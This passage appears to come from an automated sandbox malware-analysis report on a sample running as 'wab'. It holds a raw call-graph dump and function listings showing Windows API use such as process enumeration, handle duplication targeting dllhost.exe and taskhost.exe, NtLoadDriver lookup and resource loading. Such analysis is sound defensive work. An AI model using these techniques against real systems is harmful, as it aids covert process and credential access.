memcpy memcpy memset memcpy 39743->39931 39745 43af7d 39887 423426 11 API calls 39745->39887 39749 43af94 39888 423330 11 API calls 39749->39888 39750 43b529 39933 44081d 163 API calls 39750->39933 39932 43a76c 21 API calls 39752->39932 39755 43afca 39889 423330 11 API calls 39755->39889 39756 43b47e 39760 43b497 39756->39760 39928 42374a memcpy memset memcpy memcpy memcpy 39756->39928 39757 43b544 39758 43b55c 39757->39758 39934 42c02e memset 39757->39934 39935 43a87a 163 API calls 39758->39935 39929 4233ae 11 API calls 39760->39929 39762 43afdb 39890 4233ae 11 API calls 39762->39890 39766 43b4b1 39930 423399 11 API calls 39766->39930 39767 43b428 39777 43b462 39767->39777 39926 432b60 16 API calls 39767->39926 39769 43b56c 39772 43b58a 39769->39772 39936 423330 11 API calls 39769->39936 39771 43afee 39891 44081d 163 API calls 39771->39891 39937 440f84 12 API calls 39772->39937 39773 43b4c1 39939 42db80 163 API calls 39773->39939 39927 423330 11 API calls 39777->39927 39779 43b592 39938 43a82f 16 API calls 39779->39938 39782 43b5b4 39940 438c4e 163 API calls 39782->39940 39784 43b5cf 39941 42c02e memset 39784->39941 39786 43b005 39786->39681 39791 43b01f 39786->39791 39892 42d836 163 API calls 39786->39892 39787 43b1ef 39902 4233c5 16 API calls 39787->39902 39789 43b212 39903 423330 11 API calls 39789->39903 39791->39787 39900 423330 11 API calls 39791->39900 39901 42d71d 163 API calls 39791->39901 39793 43b087 39893 4233ae 11 API calls 39793->39893 39794 43add4 39794->39735 39942 438f86 16 API calls 39794->39942 39797 43b22a 39904 42ccb5 11 API calls 39797->39904 39800 43b23f 39905 4233ae 11 API calls 39800->39905 39801 43b10f 39896 423330 11 API calls 39801->39896 39803 43b257 39906 4233ae 11 API calls 39803->39906 39807 43b129 39897 4233ae 11 API calls 39807->39897 39808 43b26e 39907 4233ae 11 API calls 39808->39907 39811 43b09a 39811->39801 39894 42cc15 19 API calls 39811->39894 39895 4233ae 11 API calls 39811->39895 39812 43b282 39908 43a87a 163 API calls 39812->39908 39814 43b13c 39898 440f84 12 API calls 39814->39898 39816 43b29d 39909 423330 11 API calls 39816->39909 39819 43b2af 39822 43b2b8 39819->39822 39823 43b2ce 39819->39823 39820 43b15f 39899 4233ae 11 API calls 39820->39899 39910 4233ae 11 API calls 39822->39910 39911 440f84 12 API calls 39823->39911 39826 43b2c9 39913 4233ae 11 API calls 39826->39913 39827 43b2da 39912 42370b memset memcpy memset 39827->39912 39830 43b2f9 39914 423330 11 API calls 39830->39914 39832 43b30b 39915 423330 11 API calls 39832->39915 39834 43b325 39916 423399 11 API calls 39834->39916 39836 43b332 39917 4233ae 11 API calls 39836->39917 39838 43b354 39918 423399 11 API calls 39838->39918 39840 43b364 39919 43a82f 16 API calls 39840->39919 39842 43b370 39920 42db80 163 API calls 39842->39920 39844 43b380 39921 438c4e 163 API calls 39844->39921 39846 43b39e 39922 423399 11 API calls 39846->39922 39848 43b3ae 39923 43a76c 21 API calls 39848->39923 39850 43b3c3 39924 423399 11 API calls 39850->39924 39852->39673 39853->39676 39854->39674 39856 43a6f5 39855->39856 39862 43a765 39855->39862 39856->39862 39944 42a115 39856->39944 39860 43a73d 39861 42a115 147 API calls 39860->39861 39860->39862 39861->39862 39862->39681 39864 4397fd memset 39862->39864 39863->39683 39864->39690 39865->39681 39866->39705 39867->39694 39868->39698 39869->39695 39870->39699 39871->39703 39872->39707 39873->39709 39874->39712 39875->39719 39876->39718 39877->39723 39878->39794 39879->39716 39880->39724 39881->39727 39882->39728 39883->39728 39884->39738 39885->39741 39886->39745 39887->39749 39888->39755 39889->39762 39890->39771 39891->39786 39892->39793 39893->39811 39894->39811 39895->39811 39896->39807 39897->39814 39898->39820 39899->39791 39900->39791 39901->39791 39902->39789 39903->39797 39904->39800 39905->39803 39906->39808 39907->39812 39908->39816 39909->39819 39910->39826 39911->39827 39912->39826 39913->39830 39914->39832 39915->39834 39916->39836 39917->39838 39918->39840 39919->39842 39920->39844 39921->39846 39922->39848 39923->39850 39924->39794 39925->39767 39926->39777 39927->39756 39928->39760 39929->39766 39930->39773 39931->39752 39932->39750 39933->39757 39934->39758 39935->39769 39936->39772 39937->39779 39938->39773 39939->39782 39940->39784 39941->39794 39942->39735 39943->39681 39945 42a175 39944->39945 39947 42a122 39944->39947 39945->39862 39950 42b13b 147 API calls 39945->39950 39947->39945 39948 42a115 147 API calls 39947->39948 39951 43a174 39947->39951 39975 42a0a8 147 API calls 39947->39975 39948->39947 39950->39860 39965 43a196 39951->39965 39966 43a19e 39951->39966 39952 43a306 39952->39965 39995 4388c4 14 API calls 39952->39995 39955 42a115 147 API calls 39955->39966 39957 43a642 39957->39965 39999 4169a7 11 API calls 39957->39999 39961 43a635 39998 42c02e memset 39961->39998 39965->39947 39966->39952 39966->39955 39966->39965 39976 42ff8c 39966->39976 39984 415a91 39966->39984 39988 4165ff 39966->39988 39991 439504 13 API calls 39966->39991 39992 4312d0 147 API calls 39966->39992 39993 42be4c memcpy memcpy memcpy memset memcpy 39966->39993 39994 43a121 11 API calls 39966->39994 39968 4169a7 11 API calls 39969 43a325 39968->39969 39969->39957 39969->39961 39969->39965 39969->39968 39970 42b5b5 memset memcpy 39969->39970 39971 42bf4c 14 API calls 39969->39971 39974 4165ff 11 API calls 39969->39974 39996 42b63e 14 API calls 39969->39996 39997 42bfcf memcpy 39969->39997 39970->39969 39971->39969 39974->39969 39975->39947 40000 43817e 39976->40000 39978 42ff99 39979 42ffe3 39978->39979 39980 42ffd0 39978->39980 39983 42ff9d 39978->39983 40005 4169a7 11 API calls 39979->40005 40004 4169a7 11 API calls 39980->40004 39983->39966 39985 415a9d 39984->39985 39986 415ab3 39985->39986 39987 415aa4 memset 39985->39987 39986->39966 39987->39986 40154 4165a0 39988->40154 39991->39966 39992->39966 39993->39966 39994->39966 39995->39969 39996->39969 39997->39969 39998->39957 39999->39965 40001 438187 40000->40001 40003 438192 40000->40003 40006 4380f6 40001->40006 40003->39978 40004->39983 40005->39983 40008 43811f 40006->40008 40007 438164 40007->40003 40008->40007 40011 437e5e 40008->40011 40034 4300e8 memset memset memcpy 40008->40034 40035 437d3c 40011->40035 40013 437eb3 40013->40008 40014 437ea9 40014->40013 40019 437f22 40014->40019 40050 41f432 40014->40050 40017 437f06 40097 415c56 11 API calls 40017->40097 40021 437f7f 40019->40021 40022 432d4e 3 API calls 40019->40022 40020 437f95 40098 415c56 11 API calls 40020->40098 40021->40020 40023 43802b 40021->40023 40022->40021 40026 4165ff 11 API calls 40023->40026 40025 437fa3 40025->40013 40101 41f638 104 API calls 40025->40101 40027 438054 40026->40027 40061 437371 40027->40061 40030 43806b 40031 438094 40030->40031 40099 42f50e 138 API calls 40030->40099 40031->40025 40100 4300e8 memset memset memcpy 40031->40100 40034->40008 40036 437d69 40035->40036 40039 437d80 40035->40039 40102 437ccb 11 API calls 40036->40102 40038 437d76 40038->40014 40039->40038 40040 437da3 40039->40040 40041 437d90 40039->40041 40043 438460 134 API calls 40040->40043 40041->40038 40106 437ccb 11 API calls 40041->40106 40046 437dcb 40043->40046 40044 437de8 40105 424f26 123 API calls 40044->40105 40046->40044 40103 444283 13 API calls 40046->40103 40048 437dfc 40104 437ccb 11 API calls 40048->40104 40051 41f54d 40050->40051 40055 41f44f 40050->40055 40052 41f466 40051->40052 40136 41c635 memset memset 40051->40136 40052->40017 40052->40019 40055->40052 40059 41f50b 40055->40059 40107 41f1a5 40055->40107 40132 41c06f memcmp 40055->40132 40133 41f3b1 90 API calls 40055->40133 40134 41f398 86 API calls 40055->40134 40059->40051 40059->40052 40135 41c295 86 API calls 40059->40135 40137 41703f 40061->40137 40063 437399 40064 43739d 40063->40064 40066 4373ac 40063->40066 40144 4446ea 11 API calls 40064->40144 40067 416935 16 API calls 40066->40067 40083 4373ca 40067->40083 40068 437584 40070 4375bc 40068->40070 40151 42453e 123 API calls 40068->40151 40069 438460 134 API calls 40069->40083 40072 415c7d 16 API calls 40070->40072 40073 4375d2 40072->40073 40075 4442e6 11 API calls 40073->40075 40077 4373a7 40073->40077 40074 4251c4 137 API calls 40074->40083 40076 4375e2 40075->40076 40076->40077 40152 444283 13 API calls 40076->40152 40077->40030 40079 415a91 memset 40079->40083 40082 43758f 40150 42453e 123 API calls 40082->40150 40083->40068 40083->40069 40083->40074 40083->40079 40083->40082 40096 437d3c 135 API calls 40083->40096 40145 425433 13 API calls 40083->40145 40146 425413 17 API calls 40083->40146 40147 42533e 16 API calls 40083->40147 40148 42538f 16 API calls 40083->40148 40149 42453e 123 API calls 40083->40149 40086 4375f4 40090 437620 40086->40090 40091 43760b 40086->40091 40088 43759f 40089 416935 16 API calls 40088->40089 40089->40068 40092 416935 16 API calls 40090->40092 40153 444283 13 API calls 40091->40153 40092->40077 40095 437612 memcpy 40095->40077 40096->40083 40097->40013 40098->40025 40099->40031 40100->40025 40101->40013 40102->40038 40103->40048 40104->40044 40105->40038 40106->40038 40108 41bc3b 101 API calls 40107->40108 40109 41f1b4 40108->40109 40110 41edad 86 API calls 40109->40110 40117 41f282 40109->40117 40111 41f1cb 40110->40111 40112 41f1f5 memcmp 40111->40112 40113 41f20e 40111->40113 40111->40117 40112->40113 40114 41f21b memcmp 40113->40114 40113->40117 40115 41f326 40114->40115 40118 41f23d 40114->40118 40116 41ee6b 86 API calls 40115->40116 40115->40117 40116->40117 40117->40055 40118->40115 40119 41f28e memcmp 40118->40119 40121 41c8df 56 API calls 40118->40121 40119->40115 40120 41f2a9 40119->40120 40120->40115 40123 41f308 40120->40123 40124 41f2d8 40120->40124 40122 41f269 40121->40122 40122->40115 40125 41f287 40122->40125 40126 41f27a 40122->40126 40123->40115 40130 4446ce 11 API calls 40123->40130 40127 41ee6b 86 API calls 40124->40127 40125->40119 40128 41ee6b 86 API calls 40126->40128 40129 41f2e0 40127->40129 40128->40117 40131 41b1ca memset 40129->40131 40130->40115 40131->40117 40132->40055 40133->40055 40134->40055 40135->40051 40136->40052 40138 417044 40137->40138 40139 41705c 40137->40139 40141 416760 11 API calls 40138->40141 40143 417055 40138->40143 40140 417075 40139->40140 40142 41707a 11 API calls 40139->40142 40140->40063 40141->40143 40142->40138 40143->40063 40144->40077 40145->40083 40146->40083 40147->40083 40148->40083 40149->40083 40150->40088 40151->40070 40152->40086 40153->40095 40159 415cfe 40154->40159 40160 41628e 40159->40160 40166 415d23 __aullrem __aulldvrm 40159->40166 40167 416520 40160->40167 40161 4163ca 40173 416422 11 API calls 40161->40173 40163 416172 memset 40163->40166 40164 415cb9 10 API calls 40164->40166 40165 416422 10 API calls 40165->40166 40166->40160 40166->40161 40166->40163 40166->40164 40166->40165 40168 416527 40167->40168 40172 416574 40167->40172 40170 416544 40168->40170 40168->40172 40174 4156aa 11 API calls 40168->40174 40171 416561 memcpy 40170->40171 40170->40172 40171->40172 40172->39966 40173->40160 40174->40170 40196 41493c EnumResourceNamesW 37541 4287c1 37542 4287d2 37541->37542 37543 429ac1 37541->37543 37544 428818 37542->37544 37545 42881f 37542->37545 37559 425711 37542->37559 37558 425ad6 37543->37558 37611 415c56 11 API calls 37543->37611 37578 42013a 37544->37578 37606 420244 97 API calls 37545->37606 37549 4260dd 37605 424251 120 API calls 37549->37605 37552 4259da 37604 416760 11 API calls 37552->37604 37557 429a4d 37561 429a66 37557->37561 37562 429a9b 37557->37562 37559->37543 37559->37552 37559->37557 37560 422aeb memset memcpy memcpy 37559->37560 37564 4260a1 37559->37564 37574 4259c2 37559->37574 37577 425a38 37559->37577 37594 4227f0 memset memcpy 37559->37594 37595 422b84 15 API calls 37559->37595 37596 422b5d memset memcpy memcpy 37559->37596 37597 422640 13 API calls 37559->37597 37599 4241fc 11 API calls 37559->37599 37600 42413a 90 API calls 37559->37600 37560->37559 37607 415c56 11 API calls 37561->37607 37566 429a96 37562->37566 37609 416760 11 API calls 37562->37609 37603 415c56 11 API calls 37564->37603 37610 424251 120 API calls 37566->37610 37569 429a7a 37608 416760 11 API calls 37569->37608 37574->37558 37598 415c56 11 API calls 37574->37598 37577->37574 37601 422640 13 API calls 37577->37601 37602 4226e0 12 API calls 37577->37602 37579 42014c 37578->37579 37582 420151 37578->37582 37621 41e466 97 API calls 37579->37621 37581 420162 37581->37559 37582->37581 37583 4201b3 37582->37583 37584 420229 37582->37584 37585 4201b8 37583->37585 37586 4201dc 37583->37586 37584->37581 37587 41fd5e 86 API calls 37584->37587 37612 41fbdb 37585->37612 37586->37581 37590 4201ff 37586->37590 37618 41fc4c 37586->37618 37587->37581 37590->37581 37593 42013a 97 API calls 37590->37593 37593->37581 37594->37559 37595->37559 37596->37559 37597->37559 37598->37552 37599->37559 37600->37559 37601->37577 37602->37577 37603->37552 37604->37549 37605->37558 37606->37559 37607->37569 37608->37566 37609->37566 37610->37543 37611->37552 37613 41fbf8 37612->37613 37616 41fbf1 37612->37616 37626 41ee26 37613->37626 37617 41fc39 37616->37617 37636 4446ce 11 API calls 37616->37636 37617->37581 37622 41fd5e 37617->37622 37619 41ee6b 86 API calls 37618->37619 37620 41fc5d 37619->37620 37620->37586 37621->37582 37624 41fd65 37622->37624 37623 41fdab 37623->37581 37624->37623 37625 41fbdb 86 API calls 37624->37625 37625->37624 37627 41ee41 37626->37627 37628 41ee32 37626->37628 37637 41edad 37627->37637 37640 4446ce 11 API calls 37628->37640 37631 41ee3c 37631->37616 37634 41ee58 37634->37631 37642 41ee6b 37634->37642 37636->37617 37646 41be52 37637->37646 37640->37631 37641 41eb85 11 API calls 37641->37634 37643 41ee70 37642->37643 37644 41ee78 37642->37644 37702 41bf99 86 API calls 37643->37702 37644->37631 37647 41be6f 37646->37647 37648 41be5f 37646->37648 37653 41be8c 37647->37653 37667 418c63 37647->37667 37681 4446ce 11 API calls 37648->37681 37651 41be69 37651->37631 37651->37641 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37658 41bee7 37653->37658 37684 4446ce 11 API calls 37654->37684 37657 41bef0 37655->37657 37661 41bee2 37655->37661 37657->37658 37659 41bf01 37657->37659 37658->37651 37685 41a453 86 API calls 37658->37685 37660 41bf24 memset 37659->37660 37665 41bf14 37659->37665 37682 418a6d memset memcpy memset 37659->37682 37660->37651 37671 41ac13 37661->37671 37683 41a223 memset memcpy memset 37665->37683 37666 41bf20 37666->37660 37668 418c72 37667->37668 37669 418d51 memset memset 37668->37669 37670 418c94 37668->37670 37669->37670 37670->37653 37672 41ac52 37671->37672 37673 41ac3f memset 37671->37673 37674 41ac6a 37672->37674 37686 41dc14 19 API calls 37672->37686 37678 41acd9 37673->37678 37677 41aca1 37674->37677 37687 41519d 37674->37687 37677->37678 37679 41acc0 memset 37677->37679 37680 41accd memcpy 37677->37680 37678->37658 37679->37678 37680->37678 37681->37651 37682->37665 37683->37666 37684->37658 37686->37674 37690 4175ed 37687->37690 37698 417570 SetFilePointer 37690->37698 37693 41760a ReadFile 37694 417637 37693->37694 37695 417627 GetLastError 37693->37695 37696 41763e memset 37694->37696 37697 4151b3 37694->37697 37695->37697 37696->37697 37697->37677 37699 4175b2 37698->37699 37700 41759c GetLastError 37698->37700 37699->37693 37699->37697 37700->37699 37701 4175a8 GetLastError 37700->37701 37701->37699 37702->37644 37703 417bc5 37704 417c61 37703->37704 37705 417bda 37703->37705 37705->37704 37706 417bf6 UnmapViewOfFile CloseHandle 37705->37706 37708 417c2c 37705->37708 37710 4175b7 37705->37710 37706->37705 37706->37706 37708->37705 37715 41851e 20 API calls 37708->37715 37711 4175d6 FindCloseChangeNotification 37710->37711 37712 4175c8 37711->37712 37713 4175df 37711->37713 37712->37713 37714 4175ce Sleep 37712->37714 37713->37705 37714->37711 37715->37708 39655 4147f3 39658 414561 39655->39658 39657 414813 39659 41456d 39658->39659 39660 41457f GetPrivateProfileIntW 39658->39660 39663 4143f1 memset _itow WritePrivateProfileStringW 39659->39663 39660->39657 39662 41457a 39662->39657 39663->39662

                                                                                              Executed Functions

                                                                                              Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                              • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                              • API String ID: 594330280-3398334509
                                                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 FindCloseChangeNotification 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 594 413ee4 590->594 595 413ee7-413efe 590->595 604 413ea2-413eae CloseHandle 592->604 598 413e61-413e68 593->598 599 413e37-413e44 GetModuleHandleW 593->599 594->595 595->580 598->592 601 413e6a-413e76 598->601 599->598 600 413e46-413e5c GetProcAddress 599->600 600->598 601->592 604->583
                                                                                              APIs
                                                                                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@CloseHandleProcess32memset$AddressChangeCreateFindFirstModuleNextNotificationOpenProcProcessSnapshotToolhelp32
                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                              • API String ID: 2191996607-1740548384
                                                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                              • memcpy.MSVCRT ref: 0040B60D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                              • String ID: BIN
                                                                                              • API String ID: 1668488027-1015027815
                                                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$FirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1690352074-0
                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3558857096-0
                                                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
